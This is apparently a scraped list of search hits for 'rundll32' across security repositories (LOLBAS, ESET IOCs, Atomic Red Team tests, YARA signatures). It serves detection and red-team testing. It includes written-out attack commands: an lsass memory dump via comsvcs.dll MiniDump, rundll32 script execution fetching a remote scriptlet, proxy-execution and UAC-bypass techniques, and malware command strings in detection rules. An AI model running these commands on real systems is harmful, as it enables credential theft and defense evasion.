| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
|
| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe |
|
| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
|
| LOLBAS | Url.yml | - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta |
|
| LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe |
|
| LOLBAS | Zipfldr.yml | - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
|
| malware-ioc | misp-dukes-operation-ghost-event.json | "value": "Rundll32 - T1085", |
© ESET 2014-2018 |
| malware-ioc | misp-dukes-operation-ghost-event.json | "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", |
© ESET 2014-2018 |
| malware-ioc | misp-dukes-operation-ghost-event.json | "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", |
© ESET 2014-2018 |
| malware-ioc | misp-dukes-operation-ghost-event.json | "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", |
© ESET 2014-2018 |
| malware-ioc | invisimole.yar | $s13 = "rundll32.exe \"%s\",StartUI" |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "value": "%WINDIR%\\SysWOW64\\drivers\\Rundll32.exe", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "value": "Rundll32 - T1085", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "tag_name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "description": "The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "description": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)\n\nAnother bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\nAdversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017)\n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the <code>C:\\Windows\\System32</code> directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binaries include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "name": "misp-galaxy:mitre-attack-pattern=\"Rundll32 - T1085\"", |
© ESET 2014-2018 |
| malware-ioc | invisimole | %WINDIR%\SysWOW64\drivers\Rundll32.exe |
© ESET 2014-2018 |
| malware-ioc | invisimole | "FlashConfigEnrollee" = "shell32 ShellExec_RunDLL "C:\Windows\SysWOW64\drivers\Rundll32.exe" "C:\Windows\SysWOW64\drivers\wdigest.dll",SpInitialize %SHELLCODE_BYTES%" |
© ESET 2014-2018 |
| malware-ioc | win_apt_invisimole_sminit_chain.yml | - 'rundll32.exe shell32.dll,ShellExec_RundDLL' |
© ESET 2014-2018 |
| malware-ioc | win_apt_invisimole_wdigest_chain.yml | CommandLine\|contains: 'rundll32.exe Shell32.dll ShellExec_RunDLL cmd.exe /c mkdir SMRTNTKY\MessageB.txt' |
© ESET 2014-2018 |
| malware-ioc | win_apt_invisimole_wdigest_chain.yml | - '\Windows\SysWOW64\drivers\Rundll32.exe' |
© ESET 2014-2018 |
| malware-ioc | win_apt_invisimole_wrapper_dll.yml | Image\|endswith: '\rundll32.exe' |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | title: Suspicious Execution of Rundll32.exe |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | description: Detects instances when Rundll32.exe is executed outside of the system folder, or when Rundll32.exe is unsigned. InvisiMole Group uses a Windows XP version of Rundll32.exe to load and exploit a vulnerable Windows XP library. As Rundll32.exe is signed by a catalog file, older versions will not be signed on newer OS versions which can trigger this detection. |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | - Rundll32.exe intentionally copied outside of the system folder. |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | - Legitimate use of older version of Rundll32.exe on newer OS |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | Image\|endswith: 'rundll32.exe' |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | - '\Windows\SysWOW64\rundll32.exe' |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | - '\Windows\system32\rundll32.exe' |
© ESET 2014-2018 |
| malware-ioc | win_suspicious_rundll32.yml | - 'rundll32.exe' |
© ESET 2014-2018 |
| malware-ioc | rtm | Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host |
© ESET 2014-2018 |
| malware-ioc | rtm | rundll32.exe |
© ESET 2014-2018 |
| atomic-red-team | index.md | - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - T1218.011 Rundll32 | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Rundll32 execute VBscript command [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Rundll32 advpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #10: Rundll32 with Ordinal Value [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #11: Rundll32 with Control_RunDLL [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #9: WMI Execute rundll32 [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1218.011 Rundll32 | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Rundll32 execute VBscript command [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Rundll32 advpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #9: Execution of non-dll using rundll32.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #10: Rundll32 with Ordinal Value [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #11: Rundll32 with Control_RunDLL [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #9: WMI Execute rundll32 [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | | | | | | Rundll32 | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | | | | | | Rundll32 | | | | | | | | | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.md | C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full | MIT License. © 2018 Red Canary |
| atomic-red-team | T1003.001.md | C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | <blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote> |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | - Atomic Test #9 - WMI Execute rundll32 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | ## Atomic Test #9 - WMI Execute rundll32 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | wmic /node:#{node} process call create “rundll32.exe #{dll_to_execute} #{function_to_execute}” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | | rundll32_file_path | Location of rundll32.exe | Path | $env:windir\system32\rundll32.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | # T1218.011 - Rundll32 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | <blockquote>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</blockquote> |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #2 - Rundll32 execute VBscript command | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #3 - Rundll32 advpack.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #4 - Rundll32 ieadvpack.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #5 - Rundll32 syssetup.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #6 - Rundll32 setupapi.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #9 - Execution of non-dll using rundll32.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #10 - Rundll32 with Ordinal Value | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | - Atomic Test #11 - Rundll32 with Control_RunDLL | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:#{file_url}”).Exec(); | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #2 - Rundll32 execute VBscript command | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32 vbscript:”..\mshtml,RunHTMLApplication “+String(CreateObject(“WScript.Shell”).Run(“#{command_to_execute}”),0) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #3 - Rundll32 advpack.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with advpack.dll. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #4 - Rundll32 ieadvpack.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with ieadvpack.dll. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #5 - Rundll32 syssetup.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying “installation failed” will be opened | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .#{inf_to_execute} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #6 - Rundll32 setupapi.dll Execution | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying “installation failed” will be opened | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .#{inf_to_execute} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe URL.dll,FileProtocolHandler C:\..\Detail\akteullen.vbs | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with “rundll32 spawned wscript” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #9 - Execution of non-dll using rundll32.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Rundll32.exe running non-dll | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe #{input_file}, StartW | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #10 - Rundll32 with Ordinal Value | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe #{input_file},#2 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | ## Atomic Test #11 - Rundll32 with Control_RunDLL | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Rundll32.exe loading dll with ‘control_rundll’ within the command-line, loading a .cpl or another file type related to CVE-2021-40444. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | rundll32.exe shell32.dll,Control_RunDLL #{input_file} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.015.md | This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.015.md | Start-Process -FilePath “C:\Windows\System32\RUNDLL32.EXE” -ArgumentList ‘-sta #{clsid}’ | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.006.md | rundll32 “C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init” | MIT License. © 2018 Red Canary |
| signature-base | apt_apt29_nobelium_may21.yar | $a1 = “rundll32.exe” wide | CC BY-NC 4.0 |
| signature-base | apt_apt29_nobelium_may21.yar | $s2 = “rundll32.exe %s %s” ascii fullword | CC BY-NC 4.0 |
| signature-base | apt_apt29_nobelium_may21.yar | $s1 = “rundll32.exe {0} {1}” wide fullword | CC BY-NC 4.0 |
| signature-base | apt_apt41.yar | $s1 = “Rundll32.exe "%s", DisPlay 64” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_codoso.yar | $s0 = “rundll32 "%s",%s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_codoso.yar | $s1 = “rundll32.exe "%s", RunMeByDLL32” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_codoso.yar | $x2 = “rundll32.exe "%s", RunMeByDLL32” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_derusbi.yar | $x4 = “rundll32.exe "%s", R32 %s” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_emissary.yar | $s3 = “rundll32.exe "%s",Setting” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_freemilk.yar | $s4 = “outFile=sysDir&"\rundll32.exe"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_glassRAT.yar | // $bin2 = {34 02} // xor al, 2 —> XOR key for rundll32.exe | CC BY-NC 4.0 |
| signature-base | apt_glassRAT.yar | $s1 = “pwlfnn10,gzg” // rundll32.exe XOR 02 | CC BY-NC 4.0 |
| signature-base | apt_glassRAT.yar | $s6 = “rundll32 "%s",AddNum” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_golddragon.yar | $x2 = “rundll32.exe %s RunningRat” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_golddragon.yar | $x4 = “rundll32.exe %s ExportFunction” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_golddragon.yar | $x5 = “rundll32.exe "%s" RunningRat” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_golddragon.yar | $s5 = “rundll32.exe "%s" Run” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_keyboys.yar | $s4 = “rundll32.exe %s Main” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_keyboys.yar | $x1 = “rundll32.exe %s SSSS & exit” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_keyboys.yar | $x1 = “%s\rundll32.exe %s ServiceTake %s %s” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_khrat.yar | $x2 = “CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication” ascii | CC BY-NC 4.0 |
| signature-base | apt_korplug_fast.yar | $x1 = “%s\rundll32.exe "%s", ShadowPlay” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_korplug_fast.yar | $s1 = “%s\rundll32.exe "%s",” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_op_cloudhopper.yar | $s2 = “rundll32.exe "%s", UnInstall /update %s” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_rokrat.yar | $x3 = “outFile=sysDir&"\rundll32.exe"” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_sakula.yar | $str02 = “cmd.exe /c rundll32 "%s" Play "%s"” | CC BY-NC 4.0 |
| signature-base | apt_sakula.yar | $str08 = “cmd.exe /c rundll32 "%s" ActiveQvaw "%s"” | CC BY-NC 4.0 |
| signature-base | apt_sofacy_oct17_camp.yar | $s1 = “start rundll32.exe %path %,#1a” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_tidepool.yar | $s2 = “C:\Windows\System32\rundll32.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_ua_hermetic_wiper.yar | $sx1 = “/c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump” ascii wide | CC BY-NC 4.0 |
| signature-base | apt_wildneutron.yar | $s0 = “rundll32.exe "%s",#1” fullword wide /* PEStudio Blacklist: strings / / score: ‘33.00’ */ | CC BY-NC 4.0 |
| signature-base | apt_wilted_tulip.yar | $s1 = “%s\system32\rundll32.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_wilted_tulip.yar | $r1 = “ |
CC BY-NC 4.0 |
| signature-base | apt_wilted_tulip.yar | $s2 = “%s\system32\rundll32.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_wilted_tulip.yar | $s3 = “%s\SysWOW64\rundll32.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_winnti.yar | $a9 = “\rundll32.exe” wide | CC BY-NC 4.0 |
| signature-base | apt_winnti_burning_umbrella.yar | $s2 = “rundll32.exe %s,Startup” fullword ascii | CC BY-NC 4.0 |
